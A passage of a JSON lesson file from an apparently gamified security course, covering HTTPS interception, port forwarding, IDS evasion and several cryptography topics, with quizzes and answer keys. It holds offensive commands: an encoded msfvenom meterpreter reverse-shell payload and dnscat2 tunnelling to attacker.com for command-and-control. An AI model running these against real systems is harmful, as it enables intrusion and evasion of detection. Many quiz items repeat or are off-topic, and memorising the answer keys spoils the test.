changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"mitm-https","cat":"Network Attacks","title":"MITM Against HTTPS","diff":2,"xp":200,"intro":"Intercept encrypted traffic with a rogue certificate.","sections":[{"type":"text","content":"Install a CA cert on the victim's device, then proxy their HTTPS traffic. The proxy decrypts, inspects, and re-encrypts."},{"type":"code","lang":"bash","content":"# Using mitmproxy\nmitmproxy --mode transparent\n# Install the CA cert on victim:\n# http://mitm.it (when connected through proxy)\n# Using Burp Suite\n# Proxy > Options > Import/Export CA certificate\n# Install on target device\n# For mobile: install profile/cert in device settings"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"HTTPS MITM requires the victim to...","opts":["Use HTTP","Trust the attacker's CA certificate","Disable their firewall","Use a VPN"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"port-forwarding","cat":"Network Attacks","title":"Port Forwarding Techniques","diff":1,"xp":100,"intro":"Redirect traffic from one port/host to another \u2014 pivoting essential.","sections":[{"type":"text","content":"Port forwarding relays connections through a compromised host. Local, remote, and dynamic forwarding each serve different purposes."},{"type":"code","lang":"bash","content":"# Local: access remote_host:3306 as localhost:3306\nssh -L 3306:db.internal:3306 user@pivot\nmysql -h 127.0.0.1 -P 3306\n# Remote: expose your listener through the pivot\nssh -R 4444:localhost:4444 user@pivot\n# socat (no SSH needed)\nsocat TCP-LISTEN:8080,fork TCP:internal:80\n# netsh (Windows)\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=10.0.0.5 connectport=80"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Local port forwarding makes a remote service available on...","opts":["The remote host","Your local machine (localhost)","A third party","The DNS server"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ids-ips-bypass","cat":"Network Attacks","title":"IDS/IPS Bypass Techniques","diff":3,"xp":200,"intro":"Evade intrusion detection when stealth matters.","sections":[{"type":"text","content":"Polymorphic payloads, protocol-level evasion (fragmentation, encoding), traffic encryption, and timing manipulation all help bypass IDS/IPS."},{"type":"code","lang":"bash","content":"# Encode payload to avoid signature match\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe\n# Use HTTPS to encrypt C2 traffic\n# IDS can't inspect encrypted payloads without TLS inspection\n# Slow and low: reduce scan rate\nnmap -T0 --max-rate 1 10.10.10.5\n# Use allowed protocols (DNS, HTTPS on port 443)\n# DNS tunneling: iodine, dnscat2\ndnscat2 --dns server=attacker.com,type=TXT"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"The most effective IDS evasion is...","opts":["Faster scanning","Encrypting your traffic (HTTPS/DNS tunnel)","Using UDP","Changing MAC address"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"digital-signatures","cat":"Cryptography","title":"Digital Signatures","diff":1,"xp":75,"intro":"Prove authorship and integrity \u2014 sign with private key, verify with public.","sections":[{"type":"text","content":"A digital signature = hash(message) encrypted with your private key. Anyone with your public key can verify you signed it and the message wasn't altered."},{"type":"code","lang":"bash","content":"# Sign a file with GPG\ngpg --detach-sign --armor document.pdf\n# Verify\ngpg --verify document.pdf.asc document.pdf\n# With OpenSSL\nopenssl dgst -sha256 -sign private.pem -out sig.bin document.pdf\nopenssl dgst -sha256 -verify public.pem -signature sig.bin document.pdf"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"A digital signature uses which key to sign?","opts":["Public key","Private key","Session key","Shared key"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"pki-chain-of-trust","cat":"Cryptography","title":"PKI & Certificate Chain of Trust","diff":1,"xp":100,"intro":"How your browser trusts HTTPS \u2014 root CAs, intermediates, and leaf certs.","sections":[{"type":"text","content":"Root CAs are trusted by your OS/browser. They sign intermediate CAs, which sign server certificates. If any link breaks, the chain fails."},{"type":"code","lang":"bash","content":"# View certificate chain\nopenssl s_client -connect example.com:443 -showcerts\n# Check certificate details\nopenssl x509 -in cert.pem -text -noout\n# Verify chain\nopenssl verify -CAfile ca-bundle.crt server.crt"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"The root CA certificate is trusted because...","opts":["It's encrypted","It's pre-installed in the OS/browser trust store","The server sends it","The user approves it"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"key-derivation","cat":"Cryptography","title":"Key Derivation Functions (PBKDF2/scrypt)","diff":2,"xp":150,"intro":"Derive strong keys from weak passwords \u2014 slow by design.","sections":[{"type":"text","content":"KDFs like PBKDF2, scrypt, and Argon2 stretch passwords into keys using iteration count, salt, and memory hardness to resist brute force."},{"type":"code","lang":"python","content":"import hashlib, os\n# PBKDF2\nsalt = os.urandom(16)\nkey = hashlib.pbkdf2_hmac('sha256', b'password', salt, 100000)\n# scrypt\nkey = hashlib.scrypt(b'password', salt=salt, n=2**14, r=8, p=1, dklen=32)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"KDFs are deliberately slow to...","opts":["Save memory","Make brute-force impractical","Reduce key size","Improve compatibility"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"bleichenbacher-attack","cat":"Cryptography","title":"Bleichenbacher's RSA Attack","diff":3,"xp":250,"intro":"Exploit PKCS#1 v1.5 padding in RSA to decrypt messages.","sections":[{"type":"text","content":"If the server reveals whether RSA-PKCS#1 v1.5 padding is valid, an attacker can decrypt the pre-master secret by sending millions of modified ciphertexts."},{"type":"code","lang":"bash","content":"# The ROBOT attack (modern Bleichenbacher)\n# Tests if server is vulnerable to RSA padding oracle\npython3 robot-detect.py target.com:443\n# Mitigation: use RSA-OAEP or ECDHE key exchange"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Bleichenbacher's attack targets which padding scheme?","opts":["OAEP","PKCS#1 v1.5","PKCS#7","Zero padding"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"homomorphic-encryption","cat":"Cryptography","title":"Homomorphic Encryption Intro","diff":3,"xp":200,"intro":"Compute on encrypted data without decrypting it.","sections":[{"type":"text","content":"Fully homomorphic encryption (FHE) lets you add and multiply ciphertexts. The result, when decrypted, equals the operation on plaintexts. Used in privacy-preserving computation."},{"type":"code","lang":"python","content":"# Conceptual example (not real FHE library)\n# Enc(a) + Enc(b) = Enc(a + b)\n# Enc(a) * Enc(b) = Enc(a * b)\n# Real libraries: Microsoft SEAL, TFHE, OpenFHE\n# Use case: cloud processes encrypted medical data\n# without ever seeing the plaintext"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Homomorphic encryption allows...","opts":["Faster decryption","Computing on encrypted data","Shorter keys","Password recovery"],"ans":1},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed 